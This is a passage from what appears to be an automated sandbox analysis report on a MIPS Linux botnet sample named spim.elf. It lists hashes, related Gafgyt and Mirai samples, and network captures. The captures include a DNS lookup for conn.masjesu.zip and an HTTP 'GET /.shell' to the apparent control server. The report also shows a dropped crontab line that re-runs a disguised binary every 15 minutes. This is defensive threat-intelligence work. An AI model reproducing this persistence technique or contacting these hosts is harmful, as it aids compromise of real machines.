                                                                            • 37.44.238.66
                                                                            gigab.x86.elfGet hashmaliciousGafgytBrowse
                                                                            • 37.44.238.66
                                                                            gigab.ppc.elfGet hashmaliciousGafgytBrowse
                                                                            • 37.44.238.66
                                                                            INIT7CHsync.mips.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            sync.arm4.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            sync.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 109.202.202.202
                                                                            sync.m68k.elfGet hashmaliciousMiraiBrowse
                                                                            • 109.202.202.202
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 109.202.202.202
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 109.202.202.202
                                                                            na.elfGet hashmaliciousPrometeiBrowse
                                                                            • 109.202.202.202
                                                                            sync.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            sync.arm6.elfGet hashmaliciousUnknownBrowse
                                                                            • 109.202.202.202
                                                                            No context
                                                                            No context
                                                                            Process:/tmp/spim.elf
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):14
                                                                            Entropy (8bit):3.378783493486176
                                                                            Encrypted:false
                                                                            SSDEEP:3:TgSJCn:TgSJC
                                                                            MD5:8AFBB19413FDD9DE95D593E4185BA1D4
                                                                            SHA1:0A5570AD3900673543A0F491D9CFC5B43CBF5BE5
                                                                            SHA-256:D2872E2F185AB61D1966C2BED79A17FC6B1CB150A68074E7CCCEBC705E6729CC
                                                                            SHA-512:547698A78F9FE0355C87465D09B8D5888556AD9D55B30CE7DAD98DB4D495183ACF885DEF16A2CCF65BECA5EB2055C7BFB4067734ACEBD83D0234BD25CCD600C9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:/tmp/spim.elf.
                                                                            Process:/usr/bin/crontab
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):210
                                                                            Entropy (8bit):5.112158754027816
                                                                            Encrypted:false
                                                                            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQ5ZjEvoiGMQ5UYLtCFt3eQTbHvn:8QjHig8cgUeHLUeQTbHv
                                                                            MD5:611277552364854EF3C37AB2B390C593
                                                                            SHA1:55523B6C26C029739EE690BA3689994A810D0744
                                                                            SHA-256:2FF6B5CEBF96B0B3AC761A9E9879F22AE6BB2438B1391F35958E58A2CB1CAA21
                                                                            SHA-512:C06AE713C310F2C012845776B6D9E71D124E20B9F055FD7F9312946C45058584BFF16DF29E938DE774381E84503A27620629BD598C275FA31B9264135885F3A7
                                                                            Malicious:true
                                                                            Reputation:low
                                                                            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Wed Mar 19 03:17:57 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).*/15 * * * * /usr/lib/ld-unix.so.2.
                                                                            File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
                                                                            Entropy (8bit):5.199402310812175
                                                                            TrID:
                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                            File name:spim.elf
                                                                            File size:138'630 bytes
                                                                            MD5:c2575dcc05d235fdba210f99feadb1d9
                                                                            SHA1:825241b59ae56c543490da9da9d5713c5b5c7bc0
                                                                            SHA256:77127ae9b28ce4a505666410fc5aa343d7b3cd4dc77ec07da5c6737fe75a5fcb
                                                                            SHA512:3ba1b767a0e184ead840f6372cd439cca1fabff12caa5dcacb8605dda8420a042fe1d3b5a4d889c1acd001224ad7a7b03630fe10487411951b6b5e7ae1e0e395
                                                                            SSDEEP:1536:mVqSjUF+uLHLVdiLzLsLzLsL7LeLGLXL0LLLkLhqqvZjptByZEGkbU+/pWacxZkL:tr9dy1B2gSpLg7j
                                                                            TLSH:50D3642E3E21BFAEE268837107F39FB0939525D736E1C385E16CD6185EB428C185E794
                                                                            File Content Preview:.ELF.....................@.....4.........4. ...(....p........@...@...........................@...@.....4...4...............4.E.4.E.4...H..0.........dt.Q.................................................FP.<...'.P$...!'.......................<...'.P....!...

                                                                            Download Network PCAP: filteredfull

                                                                            • Total Packets: 18
                                                                            • 443 (HTTPS)
                                                                            • 80 (HTTP)
                                                                            • 53 (DNS)
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 19, 2025 09:17:56.498403072 CET43928443192.168.2.2391.189.91.42
                                                                            Mar 19, 2025 09:17:58.907716036 CET51780443192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:17:58.907758951 CET4435178037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:17:58.907821894 CET51780443192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:17:58.910746098 CET3612080192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:17:58.915596008 CET803612037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:17:58.915719986 CET3612080192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:17:58.918275118 CET3612080192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:17:58.922938108 CET803612037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:18:02.129564047 CET42836443192.168.2.2391.189.91.43
                                                                            Mar 19, 2025 09:18:02.448431015 CET4433360654.171.230.55192.168.2.23
                                                                            Mar 19, 2025 09:18:02.448683023 CET33606443192.168.2.2354.171.230.55
                                                                            Mar 19, 2025 09:18:02.453365088 CET4433360654.171.230.55192.168.2.23
                                                                            Mar 19, 2025 09:18:03.153369904 CET4251680192.168.2.23109.202.202.202
                                                                            Mar 19, 2025 09:18:17.743499041 CET43928443192.168.2.2391.189.91.42
                                                                            Mar 19, 2025 09:18:27.981987953 CET42836443192.168.2.2391.189.91.43
                                                                            Mar 19, 2025 09:18:28.920535088 CET803612037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:18:28.920905113 CET3612080192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:18:28.925518990 CET803612037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:18:34.125133038 CET4251680192.168.2.23109.202.202.202
                                                                            Mar 19, 2025 09:18:58.697863102 CET43928443192.168.2.2391.189.91.42
                                                                            Mar 19, 2025 09:19:19.175249100 CET42836443192.168.2.2391.189.91.43
                                                                            Mar 19, 2025 09:19:29.413758039 CET51780443192.168.2.2337.44.238.92
                                                                            Mar 19, 2025 09:19:29.413832903 CET4435178037.44.238.92192.168.2.23
                                                                            Mar 19, 2025 09:19:29.413908958 CET51780443192.168.2.2337.44.238.92
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 19, 2025 09:17:58.872179031 CET5098253192.168.2.231.1.1.1
                                                                            Mar 19, 2025 09:17:58.904239893 CET53509821.1.1.1192.168.2.23
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Mar 19, 2025 09:17:58.872179031 CET192.168.2.231.1.1.10x8a65Standard query (0)conn.masjesu.zipA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Mar 19, 2025 09:17:58.904239893 CET1.1.1.1192.168.2.230x8a65No error (0)conn.masjesu.zip77.90.153.218A (IP address)IN (0x0001)false
                                                                            Mar 19, 2025 09:17:58.904239893 CET1.1.1.1192.168.2.230x8a65No error (0)conn.masjesu.zip37.44.238.92A (IP address)IN (0x0001)false
                                                                            • 37.44.238.92
                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            0192.168.2.233612037.44.238.9280
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 19, 2025 09:17:58.918275118 CET75OUTGET /.shell HTTP/1.1
                                                                            Host: 37.44.238.92
                                                                            Connection: close


                                                                            System Behavior

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:/tmp/spim.elf
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/bin/sh
                                                                            Arguments:sh -c "crontab -l"
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/bin/sh
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):08:17:56
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/usr/bin/crontab
                                                                            Arguments:crontab -l
                                                                            File size:43720 bytes
                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/bin/sh
                                                                            Arguments:sh -c "crontab -"
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/bin/sh
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/usr/bin/crontab
                                                                            Arguments:crontab -
                                                                            File size:43720 bytes
                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                                            Start time (UTC):08:17:57
                                                                            Start date (UTC):19/03/2025
                                                                            Path:/tmp/spim.elf
                                                                            Arguments:-
                                                                            File size:5777432 bytes
                                                                            MD5 hash:0083f1f0e77be34ad27f849842bbb00c